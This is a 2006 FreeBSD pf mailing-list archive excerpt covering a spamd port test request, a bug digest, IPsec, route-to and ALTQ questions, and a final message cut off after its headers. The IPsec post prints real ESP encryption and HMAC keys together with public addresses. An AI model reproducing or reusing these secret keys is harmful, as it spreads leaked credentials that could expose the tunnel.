From owner-freebsd-pf@FreeBSD.ORG Sun Oct 1 23:32:03 2006 Return-Path: X-Original-To: freebsd-pf@freebsd.org Delivered-To: freebsd-pf@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D340316A40F for ; Sun, 1 Oct 2006 23:32:03 +0000 (UTC) (envelope-from ohauer@gmx.de) Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by mx1.FreeBSD.org (Postfix) with SMTP id E5EC843D60 for ; Sun, 1 Oct 2006 23:32:02 +0000 (GMT) (envelope-from ohauer@gmx.de) Received: (qmail invoked by alias); 01 Oct 2006 23:32:01 -0000 Received: from u18-124.dsl.vianetworks.de (EHLO [172.20.1.30]) [194.231.39.124] by mail.gmx.net (mp019) with SMTP; 02 Oct 2006 01:32:01 +0200 X-Authenticated: #1956535 Message-ID: <45204FEC.4000109@gmx.de> Date: Mon, 02 Oct 2006 01:31:56 +0200 From: Olli Hauer User-Agent: Thunderbird 1.5.0.7 (Windows/20060909) MIME-Version: 1.0 To: freebsd-pf@freebsd.org Content-Type: text/plain; charset=ISO-8859-15; format=flowed Content-Transfer-Encoding: 7bit X-Y-GMX-Trusted: 0 Subject: spamd-4.0 port tester wanted X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 01 Oct 2006 23:32:03 -0000 Hi, I have ported the last mail/spamd port from OpenBSD 4.0 to FreeBSD. The port has a new Layout, I made a split between pf and ipwf to handle conflicts and patches between them. If you are interested in testing, you can get the source here: - the new ports (mail/spamd-pf, mail/spamd-ipfw) http://sorry.mine.nu/patches/FreeBSD/ports/spamd/port_mail_spamd-pf-ipfw.shar - the distfile http://sorry.mine.nu/patches/FreeBSD/ports/spamd/spamd_4.0.tar.bz2 Instructions: get the file port_mail_spamd-pf-ipfw.shar get the file spamd_4.0.tar.bz2 cp port_mail_spamd-pf-ipfw.shar /usr/ports/mail/ cp spamd_4.0.tar.bz2 /usr/ports/distfiles/ cd /usr/ports/mail && sh port_mail_spamd-pf-ipfw.shar cd /usr/ports/mail/spamd-(pd|ipfw)/ make clean install major changes for spamd-4.0 - new parameter -h - new parameter -S - separate port for spamd-pf / spamd-ipfw ipfw patches: I have merged the ipfw patches from version spamd-3.7_1 to spamd-4.0. Since I have no machine with ipfw I cannot make full tests here. happy testing olli From owner-freebsd-pf@FreeBSD.ORG Mon Oct 2 11:08:30 2006 Return-Path: X-Original-To: freebsd-pf@FreeBSD.org Delivered-To: freebsd-pf@FreeBSD.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0526F16A541 for ; Mon, 2 Oct 2006 11:08:30 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id BF7E843D45 for ; Mon, 2 Oct 2006 11:08:29 +0000 (GMT) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (linimon@localhost [127.0.0.1]) by freefall.freebsd.org (8.13.4/8.13.4) with ESMTP id k92B8TjZ001569 for ; Mon, 2 Oct 2006 11:08:29 GMT (envelope-from owner-bugmaster@FreeBSD.org) Received: (from linimon@localhost) by freefall.freebsd.org (8.13.4/8.13.4/Submit) id k92B8S5c001565 for freebsd-pf@FreeBSD.org; Mon, 2 Oct 2006 11:08:28 GMT (envelope-from owner-bugmaster@FreeBSD.org) Date: Mon, 2 Oct 2006 11:08:28 GMT Message-Id: <200610021108.k92B8S5c001565@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: linimon set sender to owner-bugmaster@FreeBSD.org using -f From: FreeBSD bugmaster To: freebsd-pf@FreeBSD.org Cc: Subject: Current problem reports assigned to you X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 02 Oct 2006 11:08:30 -0000 Current FreeBSD problem reports Critical problems Serious problems S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/82271 pf [pf] cbq scheduler cause bad latency f kern/86072 pf [pf] Packet Filter rule not working properly (with SYN o kern/92949 pf [pf] PF + ALTQ problems with latency o sparc/93530 pf Incorrect checksums when using pf's route-to on sparc6 4 problems total. Non-critical problems S Tracker Resp. Description -------------------------------------------------------------------------------- o conf/81042 pf [pf] [patch] /etc/pf.os doesn't match FreeBSD 5.3->5.4 o kern/93825 pf [pf] pf reply-to doesn't work o kern/94992 pf [pf] [patch] pfctl complains about ALTQ missing o kern/103304 pf pf accepts nonexistent queue in rules 4 problems total. From owner-freebsd-pf@FreeBSD.ORG Mon Oct 2 23:52:12 2006 Return-Path: X-Original-To: freebsd-pf@freebsd.org Delivered-To: freebsd-pf@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ABD4E16A40F for ; Mon, 2 Oct 2006 23:52:12 +0000 (UTC) (envelope-from fwun@bigpond.net.au) Received: from imta09ps.mx.bigpond.com (imta09ps.mx.bigpond.com [144.140.82.194]) by mx1.FreeBSD.org (Postfix) with ESMTP id ED01343D45 for ; Mon, 2 Oct 2006 23:52:11 +0000 (GMT) (envelope-from fwun@bigpond.net.au) Received: from web07ps ([144.140.81.184]) by imta09ps.mx.bigpond.com with ESMTP id <20061002235209.VSMV11838.imta09ps.mx.bigpond.com@web07ps> for ; Mon, 2 Oct 2006 23:52:09 +0000 Received: from unknown by webedge.bigpond.com; Mon, 2 Oct 2006 23:52:09 +0000 Message-ID: <25946206.1159833129906.JavaMail.root@web07ps> Date: Tue, 3 Oct 2006 9:52:09 +1000 From: To: freebsd-pf@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) Sensitivity: Normal Subject: IPSEC & PF - Please help X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 02 Oct 2006 23:52:12 -0000 Hi, I am having trouble in setting up IPSEC with a remote office. I desperately need help to sort out the problem. The problem is My office can ping 10.1.100.1 at Ric's office, but I still can't ping his other IP 10.1.1.100 (assigned to his loopback lo interfaice). Ric's office can't ping me 10.1.1.1 or 10.1.10.1 at all. Tcpdump shown that the PF firewall blocked the incoming packet from 10.1.1/24, then I make a "pass" rule to let it thru. But Ric still can't ping 10.1.1.1 and 10.1.10.1 And I read the following article from PF mailing, it might be the issue in PF. http://www.mail-archive.com/freebsd-pf@freebsd.org/msg01315.html Where can I find an official release of this patch for freebsd 6.1? the FreeBSD 6.1-stable I m using is dated in early August. Can anyone please shed some lights to me? I desperately want to get this working. Here is the description of this little network: My Office (with Cable Internet, sis0 is the public interface): sis0: flags=8843 mtu 1500 options=8 inet6 fe80::20d:b9ff:fe03:e22c%sis0 prefixlen 64 scopeid 0x1 inet 60.225.5.1 netmask 0xfffffc00 broadcast 255.255.255.255 ether 00:0d:b9:03:e2:2c media: Ethernet autoselect (100baseTX ) status: active sis1: flags=8843 mtu 1500 options=8 inet6 fe80::20d:b9ff:fe03:e22d%sis1 prefixlen 64 scopeid 0x2 inet 192.168.0.254 netmask 0xffffff00 broadcast 192.168.0.255 inet 10.1.10.1 netmask 0xff000000 broadcast 10.255.255.255 ether 00:0d:b9:03:e2:2d media: Ethernet autoselect (100baseTX ) status: active lo0: flags=8049 mtu 16384 inet6 ::1 prefixlen 128 inet6 fe80::1%lo0 prefixlen 64 scopeid 0x4 inet 127.0.0.1 netmask 0xff000000 inet 10.1.1.1 netmask 0xffffff00 pflog0: flags=41 mtu 33208 pfsync0: flags=41 mtu 2020 gif102: flags=8051 mtu 1280 tunnel inet 60.225.5.1 --> 203.33.16.32 inet 10.1.1.1 --> 10.1.1.100 netmask 0xffffff00 inet6 fe80::20d:b9ff:fe03:e22c%gif102 prefixlen 64 scopeid 0x7 Ric's Office (with ADSL boardband): sis0: flags=8843 mtu 1500 options=8 inet6 fe80::20d:b9ff:fe03:eb40%sis0 prefixlen 64 scopeid 0x1 ether 00:0d:b9:03:eb:40 media: Ethernet autoselect (10baseT/UTP) status: active sis1: flags=8843 mtu 1500 options=8 inet6 fe80::20d:b9ff:fe03:eb41%sis1 prefixlen 64 scopeid 0x2 inet 192.168.0.1 netmask 0xffffff00 broadcast 192.168.0.255 inet 10.1.100.1 netmask 0xffffff00 broadcast 10.1.100.255 ether 00:0d:b9:03:eb:41 media: Ethernet autoselect (100baseTX ) status: active lo0: flags=8049 mtu 16384 inet6 ::1 prefixlen 128 inet6 fe80::1%lo0 prefixlen 64 scopeid 0x4 inet 127.0.0.1 netmask 0xff000000 inet 10.1.1.100 netmask 0xffffff00 pflog0: flags=41 mtu 33208 pfsync0: flags=41 mtu 2020 tun0: flags=8051 mtu 1492 inet 203.33.16.32 --> 203.17.1.1 netmask 0xffffffff Opened by PID 362 #Script for establish IPSEC at My Office: /sbin/ifconfig lo0 inet 10.1.1.1/24 alias setkey -FP setkey -F # Tunnel to Ric office /sbin/ifconfig gif102 destroy /sbin/ifconfig gif102 create /sbin/ifconfig gif102 tunnel 60.225.5.1 203.33.16.32 /sbin/ifconfig gif102 inet 10.1.1.1 10.1.1.100 netmask 255.255.255.0 /sbin/route delete 10.1.100.1/24 /sbin/route delete 172.17.100.0/24 /sbin/route add 10.1.100.1/24 10.1.1.100 /sbin/route add 172.17.100.0/24 10.1.1.100 setkey -c << EOF Firewall rule at My office: # pfctl -sr pass in on sis1 inet proto tcp from any to 127.0.0.1 port = 3128 keep state pass out on sis0 inet proto tcp from any to any port = http keep state block drop in log all block drop in log quick on sis0 inet proto udp from any to 255.255.255.255 block drop in log quick on sis1 inet proto udp from any to 255.255.255.255 pass in on lo0 all pass out quick on sis0 all keep state pass out quick on sis1 all keep state pass in on sis1 all keep state pass out on sis0 proto tcp all flags S/SA keep state pass out on sis1 proto tcp all flags S/SA keep state pass in on sis0 proto tcp from any to any port = ssh flags S/SA keep state pass in on sis0 proto tcp from any to any port = http flags S/SA keep state pass in on sis0 proto udp from any to any port = commplex-main keep state pass in quick on ath0 all keep state pass in quick on sis0 inet proto esp from 60.225.5.1 to 203.33.16.32 pass out quick on sis0 inet proto esp from 203.33.16.32 to 60.225.5.1 pass in quick proto ipencap all pass in quick inet from 10.1.100.0/24 to 10.1.1.0/24 pass out quick inet from 10.1.1.0/24 to 10.1.100.0/24 pass in quick inet from 10.1.1.0/24 to any pass in quick on sis0 inet proto udp from 60.225.5.1 to 203.33.16.32 port = isakmp pass out quick on sis0 inet proto udp from 203.33.163.232 to 60.225.5.1 port = isakmp pass quick on gif102 all Nework routing table at My office: # netstat -rn | less Routing tables Internet: Destination Gateway Flags Refs Use Netif Expire default 60.225.5.111 UGS 0 55131 sis0 10 link#2 UC 0 1 sis1 10.1.1.1 10.1.1.1 UH 0 0 lo0 10.1.100/24 10.1.1.100 UGS 0 7 gif102 60.225.5/22 link#1 UC 0 0 sis0 60.225.5.111 00:0f:35:45:78:70 UHLW 2 0 sis0 1200 127.0.0.1 127.0.0.1 UH 0 541 lo0 172.17.4/24 link#3 UC 0 0 ath0 172.17.100/24 10.1.1.100 UGS 0 0 gif102 192.168.0 link#2 UC 0 0 sis1 # Tunnel to Ric office spdadd 10.1.1.1 10.1.1.100 any -P out ipsec esp/tunnel/10.1.1.1-10.1.1.100/require ; spdadd 10.1.1.100 10.1.1.1 any -P in ipsec esp/tunnel/10.1.1.100-10.1.1.1/require ; add 10.1.1.1 10.1.1.100 esp 2744 -m tunnel -E blowfish-cbc 0xC0AD6D1F390BBECD431A75A346 1C2FD62433DD1D947804CAD75133DABF2F25C4B6F928521AECE611218C007CE917CC986CF36382DB29D11B -A hmac-sha1 0xB4D3FBE932C36E1D09BA4827F78A542D37C936BE ; add 10.1.1.100 10.1.1.1 esp 3944 -m tunnel -E blowfish-cbc 0xB4E4556530711A5831A8289B4A 8DB9334F62A878E6FAAF889A243FEA7BDEEE3058A4E8220289C02A09321BEFE0619AA641006F3C02230B3B -A hmac-sha1 0xAFB28AABC10B4B704A730CB070A719ED93254AB6 ; #Script for establish IPSEC at Ric's office: /sbin/ifconfig lo0 inet 10.1.1.100/24 alias setkey -FP setkey -F # Tunnel to My Office /sbin/ifconfig gif102 destroy /sbin/ifconfig gif102 create /sbin/ifconfig gif102 tunnel 203.33.16.32 60.225.5.1 /sbin/ifconfig gif102 inet 10.1.1.100 10.1.1.1 netmask 255.255.255.0 /sbin/route delete 10.1.1.1/24 /sbin/route delete 172.17.4.0/24 /sbin/route add 10.1.1.1/24 10.1.1.1 /sbin/route add 172.17.4.0/24 10.1.1.1 setkey -c << EOF # Tunnel to My office spdadd 10.1.1.100 10.1.1.1 any -P out ipsec esp/tunnel/10.1.1.100-10.1.1.1/require ; spdadd 10.1.1.1 10.1.1.100 any -P in ipsec esp/tunnel/10.1.1.1-10.1.1.100/require ; add 10.1.1.100 10.1.1.1 esp 2744 -m tunnel -E blowfish-cbc 0xC0AD6D1F390BBECD431A75A346 1C2FD62433DD1D947804CAD75133DABF2F25C4B6F928521AECE611218C007CE917CC986CF36382DB29D11B -A hmac-sha1 0xB4D3FBE932C36E1D09BA4827F78A542D37C936BE ; add 10.1.1.1 10.1.1.100 esp 3944 -m tunnel -E blowfish-cbc 0xB4E4556530711A5831A8289B4A 8DB9334F62A878E6FAAF889A243FEA7BDEEE3058A4E8220289C02A09321BEFE0619AA641006F3C02230B3B -A hmac-sha1 0xAFB28AABC10B4B704A730CB070A719ED93254AB6 ; EOF Firewall rule at Ric's office: # pfctl -sr pass in on sis1 inet proto tcp from any to 127.0.0.1 port = 3128 keep state pass out on tun0 inet proto tcp from any to any port = http keep state block drop in log all block drop in log quick on tun0 inet proto udp from any to 255.255.255.255 block drop in log quick on sis1 inet proto udp from any to 255.255.255.255 pass in on lo0 all pass out quick on tun0 all keep state pass out quick on sis1 all keep state pass in on sis1 all keep state pass out on tun0 proto tcp all flags S/SA keep state pass out on sis1 proto tcp all flags S/SA keep state pass in on tun0 proto tcp from any to any port = ssh flags S/SA keep state pass in on tun0 proto tcp from any to any port = http flags S/SA keep state pass in on tun0 proto udp from any to any port = commplex-main keep state pass in quick on ath0 all keep state pass in quick on tun0 inet proto esp from 203.33.163.232 to 60.225.5.1 pass out quick on tun0 inet proto esp from 60.225.5.1 to 203.33.16.32 pass in quick proto ipencap all pass in quick inet from 10.1.1.0/24 to 10.1.100.0/24 pass in quick inet from 10.1.1.0/24 to 10.1.1.0/24 pass out quick inet from 10.1.100.0/24 to 10.1.1.0/24 pass out quick inet from 10.1.100.0/24 to 10.1.100.0/24 pass in quick on tun0 inet proto udp from 203.33.16.32 to 60.225.5.1 port = isakmp pass out quick on tun0 inet proto udp from 60.225.5.1 to 203.33.16.32 port = isakmp pass quick on gif102 all Network routing table at Ric's office: # netstat -rn Routing tables Internet: Destination Gateway Flags Refs Use Netif Expire default 203.17.101.81 UGS 0 2005455 tun0 10.1.1/24 10.1.1.1 UGS 0 0 gif102 10.1.1.1 10.1.1.100 UH 972 1015 gif102 10.1.1.100 10.1.1.100 UH 0 16 lo0 10.1.100/24 link#2 UC 0 0 sis1 10.1.100.1 00:0d:b9:03:eb:41 UHLW 1 10 lo0 127.0.0.1 127.0.0.1 UH 0 3335 lo0 172.17.4/24 10.1.1.1 UGS 0 586 gif102 192.168.0 link#2 UC 0 1 sis1 192.168.0.198 00:0d:60:ff:b7:1f UHLW 1 1141717 sis1 818 192.168.0.200 00:14:22:fd:cc:8f UHLW 1 9945 sis1 203.17.10.8 203.33.16.32 UH 1 0 tun0 Thanks S From owner-freebsd-pf@FreeBSD.ORG Tue Oct 3 22:57:23 2006 Return-Path: X-Original-To: freebsd-pf@freebsd.org Delivered-To: freebsd-pf@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2014A16A417 for ; Tue, 3 Oct 2006 22:57:23 +0000 (UTC) (envelope-from jd@ods.org) Received: from update.ods.org (update.ods.org [66.246.72.188]) by mx1.FreeBSD.org (Postfix) with ESMTP id AD35743D55 for ; Tue, 3 Oct 2006 22:57:22 +0000 (GMT) (envelope-from jd@ods.org) Received: from localhost (221056.ds.nac.net [127.0.0.1]) by update.ods.org (Postfix) with ESMTP id C374222758 for ; Tue, 3 Oct 2006 18:57:21 -0400 (EDT) X-Virus-Scanned: amavisd-new at ods.org Received: from update.ods.org ([127.0.0.1]) by localhost (update.ods.org [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id cmSQxP0ZRuDE for ; Tue, 3 Oct 2006 18:57:18 -0400 (EDT) Received: from webmail.ods.org (221056.ds.nac.net [127.0.0.1]) by update.ods.org (Postfix) with ESMTP id E090E2275E for ; Tue, 3 Oct 2006 18:57:17 -0400 (EDT) Received: from 10.8.0.18 (SquirrelMail authenticated user geniusj); by webmail.ods.org with HTTP; Tue, 3 Oct 2006 15:57:17 -0700 (MST) Message-ID: <2712.10.8.0.18.1159916237.squirrel@10.8.0.18> Date: Tue, 3 Oct 2006 15:57:17 -0700 (MST) From: "Jason DiCioccio" To: freebsd-pf@freebsd.org User-Agent: SquirrelMail/1.4.3a X-Mailer: SquirrelMail/1.4.3a MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) Importance: Normal Subject: route-to being ignored? X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 03 Oct 2006 22:57:23 -0000 Greetings, I'm having a bit of an issue here with pf and the route-to statement on 6.1-RELEASE-p3/i386. Basically, I have the following rule (at the top of my rules, no less): pass out quick route-to ( tun0 10.8.1.5 ) from 66.29.58.71/32 to any I've tried this rule with keep state, without keep state, with quick, without quick, basically everything I could think of. And I haven't been able to get this to do anything at all. Traffic is still flowing out of ng0 (where the default route resides). 66.29.58.71 is an IP bound to lo0 on the server. Traffic for it comes in over tun0, for which the ifconfig follows: tun0: flags=8051 mtu 1500 inet6 fe80::24a7:3207:1aa1:c985%tun0 prefixlen 64 scopeid 0xa inet 10.8.1.6 --> 10.8.1.5 netmask 0xffffffff Opened by PID 347 Currently if I do a tcpdump on ng0, I can see the ICMP Echo replies going back out over ng0 while the requests come in over tun0. I should also note that I haven't been able to get this working with ipfw fwd either. options IPFIREWALL_FORWARD is in the kernel config as well. Anyone have any idea what I'm missing? Thanks! Jason DiCioccio From owner-freebsd-pf@FreeBSD.ORG Wed Oct 4 00:10:48 2006 Return-Path: X-Original-To: freebsd-pf@freebsd.org Delivered-To: freebsd-pf@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D1D2F16A40F for ; Wed, 4 Oct 2006 00:10:48 +0000 (UTC) (envelope-from jd@ods.org) Received: from update.ods.org (update.ods.org [66.246.72.188]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3433343D46 for ; Wed, 4 Oct 2006 00:10:47 +0000 (GMT) (envelope-from jd@ods.org) Received: from localhost (221056.ds.nac.net [127.0.0.1]) by update.ods.org (Postfix) with ESMTP id 5031128F7F; Tue, 3 Oct 2006 20:10:47 -0400 (EDT) X-Virus-Scanned: amavisd-new at ods.org Received: from update.ods.org ([127.0.0.1]) by localhost (update.ods.org [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id KKH2R8CcpUXL; Tue, 3 Oct 2006 20:10:44 -0400 (EDT) Received: from webmail.ods.org (221056.ds.nac.net [127.0.0.1]) by update.ods.org (Postfix) with ESMTP id C9A2128F58; Tue, 3 Oct 2006 20:10:41 -0400 (EDT) Received: from 10.8.0.18 (SquirrelMail authenticated user geniusj); by webmail.ods.org with HTTP; Tue, 3 Oct 2006 17:10:41 -0700 (MST) Message-ID: <3114.10.8.0.18.1159920641.squirrel@10.8.0.18> In-Reply-To: <4522FBAE.8020406@macaroon.net> References: <2712.10.8.0.18.1159916237.squirrel@10.8.0.18> <4522FBAE.8020406@macaroon.net> Date: Tue, 3 Oct 2006 17:10:41 -0700 (MST) From: "Jason DiCioccio" To: "Cameron Murdoch" User-Agent: SquirrelMail/1.4.3a X-Mailer: SquirrelMail/1.4.3a MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) Importance: Normal Cc: freebsd-pf@freebsd.org Subject: Re: route-to being ignored? X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 04 Oct 2006 00:10:48 -0000 > Jason DiCioccio wrote: >> Greetings, >> I'm having a bit of an issue here with pf and the route-to statement >> on >> 6.1-RELEASE-p3/i386. >> >> >> Basically, I have the following rule (at the top of my rules, no >> less): >> >> pass out quick route-to ( tun0 10.8.1.5 ) from 66.29.58.71/32 to any >> >> I've tried this rule with keep state, without keep state, with quick, >> without quick, basically everything I could think of. And I haven't >> been able to get this to do anything at all. Traffic is still flowing >> out of ng0 (where the default route resides). >> >> 66.29.58.71 is an IP bound to lo0 on the server. Traffic for it comes >> in over tun0, for which the ifconfig follows: >> >> tun0: flags=8051 mtu 1500 >> inet6 fe80::24a7:3207:1aa1:c985%tun0 prefixlen 64 scopeid 0xa >> inet 10.8.1.6 --> 10.8.1.5 netmask 0xffffffff >> Opened by PID 347 >> >> Currently if I do a tcpdump on ng0, I can see the ICMP Echo replies >> going back out over ng0 while the requests come in over tun0. I should >> also note that I haven't been able to get this working with ipfw fwd >> either. >> >> options IPFIREWALL_FORWARD is in the kernel config as well. >> >> Anyone have any idea what I'm missing? > > If the traffic is coming in on tun0 then you probably want reply-to not > route-to. Sorry, I should've mentioned that I've tried this too. It's possible that I did it wrong, but I did variations of this: pass in quick on tun0 reply-to ( tun0 10.8.1.5 ) from any to 66.29.58.71/32 keep state If I'm doing this wrong, let me know. Regards, -JD- From owner-freebsd-pf@FreeBSD.ORG Wed Oct 4 00:48:41 2006 Return-Path: X-Original-To: freebsd-pf@freebsd.org Delivered-To: freebsd-pf@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B5A3B16A412 for ; Wed, 4 Oct 2006 00:48:41 +0000 (UTC) (envelope-from jd@ods.org) Received: from update.ods.org (update.ods.org [66.246.72.188]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0435C43D46 for ; Wed, 4 Oct 2006 00:48:40 +0000 (GMT) (envelope-from jd@ods.org) Received: from localhost (221056.ds.nac.net [127.0.0.1]) by update.ods.org (Postfix) with ESMTP id 6945B28FA0; Tue, 3 Oct 2006 20:48:40 -0400 (EDT) X-Virus-Scanned: amavisd-new at ods.org Received: from update.ods.org ([127.0.0.1]) by localhost (update.ods.org [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id K44GL5NFkbk3; Tue, 3 Oct 2006 20:48:38 -0400 (EDT) Received: from webmail.ods.org (221056.ds.nac.net [127.0.0.1]) by update.ods.org (Postfix) with ESMTP id 2B4F728FA2; Tue, 3 Oct 2006 20:48:38 -0400 (EDT) Received: from 10.8.0.18 (SquirrelMail authenticated user geniusj); by webmail.ods.org with HTTP; Tue, 3 Oct 2006 17:48:38 -0700 (MST) Message-ID: <3286.10.8.0.18.1159922918.squirrel@10.8.0.18> In-Reply-To: <3114.10.8.0.18.1159920641.squirrel@10.8.0.18> References: <2712.10.8.0.18.1159916237.squirrel@10.8.0.18> <4522FBAE.8020406@macaroon.net> <3114.10.8.0.18.1159920641.squirrel@10.8.0.18> Date: Tue, 3 Oct 2006 17:48:38 -0700 (MST) From: "Jason DiCioccio" To: "Jason DiCioccio" User-Agent: SquirrelMail/1.4.3a X-Mailer: SquirrelMail/1.4.3a MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) Importance: Normal Cc: freebsd-pf@freebsd.org Subject: SOLVED: route-to being ignored? X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 04 Oct 2006 00:48:41 -0000 OK. I finally got this working.. Apparently you can't have a reply-to rule along with an rdr rule. I guess pf won't track state for both filtering and rewriting at the same time. Thanks! -JD- >> Jason DiCioccio wrote: >>> Greetings, >>> I'm having a bit of an issue here with pf and the route-to statement >>> on >>> 6.1-RELEASE-p3/i386. >>> >>> >>> Basically, I have the following rule (at the top of my rules, no >>> less): >>> >>> pass out quick route-to ( tun0 10.8.1.5 ) from 66.29.58.71/32 to any >>> >>> I've tried this rule with keep state, without keep state, with quick, >>> without quick, basically everything I could think of. And I haven't >>> been able to get this to do anything at all. Traffic is still flowing >>> out of ng0 (where the default route resides). >>> >>> 66.29.58.71 is an IP bound to lo0 on the server. Traffic for it >>> comes >>> in over tun0, for which the ifconfig follows: >>> >>> tun0: flags=8051 mtu 1500 >>> inet6 fe80::24a7:3207:1aa1:c985%tun0 prefixlen 64 scopeid 0xa >>> inet 10.8.1.6 --> 10.8.1.5 netmask 0xffffffff >>> Opened by PID 347 >>> >>> Currently if I do a tcpdump on ng0, I can see the ICMP Echo replies >>> going back out over ng0 while the requests come in over tun0. I should >>> also note that I haven't been able to get this working with ipfw fwd >>> either. >>> >>> options IPFIREWALL_FORWARD is in the kernel config as well. >>> >>> Anyone have any idea what I'm missing? >> >> If the traffic is coming in on tun0 then you probably want reply-to not >> route-to. > > Sorry, I should've mentioned that I've tried this too. It's possible that > I did it wrong, but I did variations of this: > > pass in quick on tun0 reply-to ( tun0 10.8.1.5 ) from any to > 66.29.58.71/32 keep state > > If I'm doing this wrong, let me know. > > Regards, > -JD- > > From owner-freebsd-pf@FreeBSD.ORG Thu Oct 5 13:56:59 2006 Return-Path: X-Original-To: freebsd-pf@freebsd.org Delivered-To: freebsd-pf@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 790BC16A403 for ; Thu, 5 Oct 2006 13:56:59 +0000 (UTC) (envelope-from falexsandro@inbox.com) Received: from WM27.inbox.com (wm27.inbox.com [208.50.6.27]) by mx1.FreeBSD.org (Postfix) with SMTP id EC0DA43D45 for ; Thu, 5 Oct 2006 13:56:58 +0000 (GMT) (envelope-from falexsandro@inbox.com) Received: from inbox.com (127.0.0.1:25) by inbox.com with [InBox.Com SMTP Server] id <610050062904.WM27> for from ; Thu, 5 Oct 2006 5:56:53 AM -0800 Mime-Version: 1.0 Date: Thu, 5 Oct 2006 05:56:53 -0800 Message-ID: <65A313B6966.00000132falexsandro@inbox.com> From: Flavio Silva To: freebsd-pf@freebsd.org X-Mailer: INBOX.COM Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-IWM-ACU: mZ2McaDwyFQFC17WnBg-N3UwBMc86WjGGQpogtqNHXU41oiU4jsKLOiVvJkf JsZCVxtLREoLHzdVbiT3M6wg1yIetoDhBgJDhpEnvmxzz5ZwekUI8-hascQB O5ml7pjH9Vma6O_c_jzBA Subject: PF/Altq X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions about packet filter \(pf\)" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 05 Oct 2006 13:56:59 -0000 Hi People=21 I would like your help, in creating a rule to control the bandwidth for = 200 hosts... i'm trying to set a limit to 64kbit/s for each host. There is any way to do this using altq without to had to create a queue = for each host? Thanks in advance, Fl=C3=A1vio From owner-freebsd-pf@FreeBSD.ORG Thu Oct 5 16:08:34 2006 Return-Path: X-Original-To: freebsd-pf@freebsd.org Delivered-To: freebsd-pf@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CDECC16A403 for ; Thu, 5 Oct 2006 16:08:34 +0000 (UTC) (envelope-from mcdouga9@daemon.egr.msu.edu) Received: from daemon.egr.msu.edu (daemon.egr.msu.edu [35.9.44.65]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2802A43D7C for ; Thu, 5 Oct 2006 16:08:28 +0000 (GMT) (envelope-from mcdouga9@daemon.egr.msu.edu) Received: by daemon.egr.msu.edu (Postfix, from userid 21281) id 5D1941CC87; Thu, 5 Oct 2006 12:08:27 -0400 (EDT) Date: Thu, 5 Oct 2006 12:08:27 -0400 From: Adam McDougall To: freebsd-pf@freebsd.org Message-ID: <20061005160827.GB46920@egr.msu.edu> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.13 (2006-08-11) Subject: pf: BAD state happens often with portsnap fetch update X-BeenThere: freebsd-pf@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Technical discussion and general questions 